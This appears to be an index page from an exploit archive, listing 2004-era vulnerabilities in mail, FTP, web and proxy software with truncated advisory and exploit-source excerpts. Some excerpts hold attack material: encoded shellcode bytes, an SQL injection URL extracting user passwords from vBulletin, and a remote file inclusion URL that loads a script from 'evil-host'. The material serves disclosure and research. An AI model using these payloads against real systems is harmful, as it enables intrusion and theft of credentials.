Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow
source: https://www.securityfocus.com/bid/11977/info Bolthole Filter is prone to a buffer overflow vulnerability. This issue is exposed when the software parses email address data. If successfully exploited, this vulnerability could result in execution of arbitrary code in the context of the...
Active Server Corner ASP Calendar 1.0 - Administrative Access
source: https://www.securityfocus.com/bid/11931/info ASP Calendar is reported prone to an unauthorized administrative access vulnerability. An unauthorized remote attacker can access an administrative script and potentially gain...
TipxD 1.1.1 - Not SETUID Local Format String
/ tipxdexp.c TipxD Format String Vulnerability TipxD - SECU No System Group - http://www.nosystem.com.ar / include include define PATH "/bin/tipxd" define OBJDUMP "/usr/bin/objdump" define GREP "/usr/bin/grep" unsigned char shellcode= / aleph1 shellcode.45b /...
F-Secure Policy Manager 5.11 - FSMSH.dll CGI Application Installation Full Path Disclosure
source: https://www.securityfocus.com/bid/11869/info F-Secure Policy Manager includes a CGI application named 'fsmsh.dll'. By supplying unexpected input as an argument to the 'fsmsh.dll' application the...
Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit
Exploit for unknown platform in category dos / poc ========================================================= Jana Server include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include includ...
JSPWiki 2.1 - Cross-Site Scripting
Prozilla 1.3.6 - Remote Stack Overflow
/ 20/10/2004 This is a private work of Serkan Akpolat [email protected] for the unpublished prozilla-1.3.6 format string/buffer overflow vulnerability, though this version only exploits the stack overflow. Tested against current gentoo/slack/debian/sus...
MS Windows Compressed Zipped Folders Exploit (MS04-034)
Exploit for unknown platform in category remote exploits ======================================================= MS Windows Compressed Zipped Folders Exploit MS04-034 ======================================================= / Microsoft Windows Vulnerability in Compressed zipped Folders MS04-034...
SLMail 5.5 POP3 PASS Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ============================================ SLMail 5.5 POP3 PASS Buffer Overflow Exploit ============================================ SLmail 5.5 POP3 PASS Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanill...
vBulletin - 'LAST.php' SQL Injection
Example: http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201 milw0rm.com 2004-11-15...
[Full-Disclosure] [Advisory + Exploit] SlimFTPd <= 3.15
My nice words again are to kotik biatch. clean code on my website. / SlimFTPd = 3.15, Remote Buffer Overflow Exploit v0.1. Bind a shellcode to the port 101. Full disclosure and exploit by class101 at DFind.kd-team.com & n3ws at EFnet 10 november 2004 Thanx to HDMoore and Metasploit.com for their...
CCProxy Log - Remote Stack Overflow
include include include pragma commentlib, "ws232" unsigned char EndChar= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/1.0 unsigned char shellcode = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" "xe8xedxffxffxff" / 254 bytes shellcode, xor with 0xee / / offset 92=IP offset 99=PORT/...
[Full-Disclosure] [Advisory + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit
Hi List, I found yesterday this bug in the last version of MiniShare. This is a simple buffer overflow in the address link. Vendors are contacted at http://minishare.sourceforge.net 1 hour only before the public advisory. Actually no fix is available. The exploit is available in attachment for...
Apache 2.0.52 Multiple Space Header DoS (c code)
Exploit for unknown platform in category dos / poc ================================================ Apache 2.0.52 Multiple Space Header DoS c code ================================================ /// Apache 2.0.52 and earlier DoS - Chintan Trivedi include "stdafx.h" include "winsock.h" include...
socat <= 1.4.0.2 Local Format String Exploit (not setuid)
Exploit for linux platform in category local exploits ========================================================= socat No System Group - http://www.nosystem.com.ar email protected:$ make socatexp email protected:$ ./socatexp socat shellcode address = 0xbfffffb9 .dtors address = 0x080740c4 2004/10/...
Monit <= 4.2 Basic Authentication Remote Root Exploit
Exploit for linux platform in category remote exploits ===================================================== Monit linuxmailorg - Abhisek Datta abhisekfrontru 06.04.2004 http://www.eos-india.net New Targets : RedHat 9 Fedora Core 2 Slackware 8.1 Update Code :...
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
-- IIS NNTP Service XPAT command heap overflow proof of concept Author: Lucas Lavarello lucas at coresecurity dot com Juliano Rizzo juliano at coresecurity dot com Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc. All rights reserved. THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRES...
ocPortal 1.0.3 - Remote File Inclusion
http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put script funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host supports php. '; ?...
Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access
source: https://www.securityfocus.com/bid/11342/info Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests. An attacker may leverage this issue to bypass authentication...
Radmin (Remote Administrator) Port 10002 - Possible GDI Compromise
The remote host is running radmin - a remote administration tool - on port 10002. This indicates that an attacker may have exploited one of the flaws described in MS04-028 with a widely available exploit. As a result, anyone may connect to the remote host and gain control by logging into the remo...